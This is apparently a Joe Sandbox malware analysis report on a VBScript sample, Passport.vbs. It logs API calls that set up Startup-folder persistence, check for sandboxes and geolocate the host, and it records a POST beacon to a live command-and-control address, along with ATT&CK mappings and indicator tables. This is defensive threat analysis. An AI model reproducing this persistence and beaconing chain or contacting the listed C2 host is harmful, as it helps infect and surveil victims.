Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: pesuti.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\Temp\Passport.vbs

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();5000IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbem

Persistence and Installation Behavior

Windows Shell Script Host drops VBS files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\Passport.vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown	Network traffic detected: HTTP traffic on port 456 -> 49730

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential context-aware VBS script found (checks for environment specific values)

Source:	Initial file: If objItem.Model = "Google Compute Engine" Then
Source: C:\Windows\System32\wscript.exe	Dropped file: If objItem.Model = "Google Compute Engine" Then			Jump to dropped file

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnq
Source: wscript.exe, 00000000.00000002.4526205993.000001F245702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCFA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP@

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 34.117.59.81 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 185.244.29.74 456			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	421 Scripting	Valid Accounts	11 Windows Management Instrumentation	421 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	22 System Information Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Passport.vbs	0%	ReversingLabs
Passport.vbs	3%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
ipinfo.io	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Link
http://185.244.29.74:456/document	0%	Virustotal	Browse
https://ipinfo.io/countryS	0%	Virustotal	Browse
https://ipinfo.io/org	0%	Virustotal	Browse
https://ipinfo.io/country	0%	Virustotal	Browse
https://ipinfo.io/countryq	0%	Virustotal	Browse
https://ipinfo.io/countryW	0%	Virustotal	Browse
https://ipinfo.io/	0%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.59.81	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.244.29.74:456/document	true	0%, Virustotal, Browse	unknown
https://ipinfo.io/org	true	0%, Virustotal, Browse	unknown
https://ipinfo.io/country	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.244.29.74:456/documentB	wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentG	wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/countryz%	wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/country6%	wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentage:	wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/countryS	wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://185.244.29.74:456/documentT	wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/countryY:	wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentnE	wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74/j	wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentX	wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentJ	wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/document32	wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/document&	wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/	wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://ipinfo.io/countryq	wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://185.244.29.74/d1	wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/document_	wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentr	wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentq	wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74:456/documentgE	wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/countryW	wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ipinfo.io/org_	wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.244.29.74/	wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ipinfo.io/country_	wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
185.244.29.74	unknown	Netherlands		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523251
Start date and time:	2024-10-01 11:00:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Passport.vbs
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@2/7@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:01:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.59.81	YjcgpfVBcm.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	lePDF.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	6Mpsoq1.php.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	mjOiDa1hrN.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	8ym4cxJPyl.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	GKrKPXOkdF.zsb.dll	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	JuhnladbIs.qao.dll	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	bdsBbxwPyV.ena.dll	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	fblXRRCHON.pos.dll	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	GmsiIZXruf.hos.dll	Get hash	malicious	Unknown	Browse	ipinfo.io/json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	OuaJzAFCTk.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	http://telegsramc.club/	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	http://cancelarpedidoaqui003.weebly.com/	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz	Browse	34.117.59.81
	http://telegriame.club/	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	http://telegrvams.club/	Get hash	malicious	Telegram Phisher	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	34.117.59.81
	http://glamorous-productive-baboon.glitch.me/	Get hash	malicious	Unknown	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	34.117.59.81

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DAVID_CRAIGGG	ExeFile (351).exe	Get hash	malicious	Quasar	Browse	91.193.75.100
	PO-4ADB89.bat	Get hash	malicious	AgentTesla	Browse	185.244.30.19
	Ozb8aojWew.exe	Get hash	malicious	GuLoader	Browse	185.244.30.5
	P0-ADFUK.bat.exe	Get hash	malicious	GuLoader	Browse	185.244.30.5
	9y5FW1JvLf.exe	Get hash	malicious	Remcos	Browse	185.140.53.144
	ORDER-245140097DF.js	Get hash	malicious	AsyncRAT	Browse	185.165.153.116
	SecuriteInfo.com.Linux.Kaiji.16.13149.10467.elf	Get hash	malicious	Chaos	Browse	185.140.53.36
	SecuriteInfo.com.ELF.Chaos-B.4493.24448.elf	Get hash	malicious	Chaos	Browse	185.140.53.36
	SecuriteInfo.com.Trojan.Linux.GenericKD.24461.21195.15576.elf	Get hash	malicious	Chaos	Browse	185.140.53.36
	SecuriteInfo.com.ELF.Agent-BSR.32705.13148.elf	Get hash	malicious	Chaos	Browse	185.140.53.36
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	http://www.aieov.com/setup.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	OuaJzAFCTk.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	34.117.239.71
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	https://en.softonic.com	Get hash	malicious	Unknown	Browse	34.117.239.71
	https://ole798.com/	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://www.iphone.trustefy.org/	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://attofficialvalidation.weebly.com/	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://elderly-same-archeology.glitch.me/public/nfcu703553.HTML	Get hash	malicious	HTMLPhisher	Browse	34.117.77.79
	https://currently8220.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	34.117.77.79

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	34.117.59.81
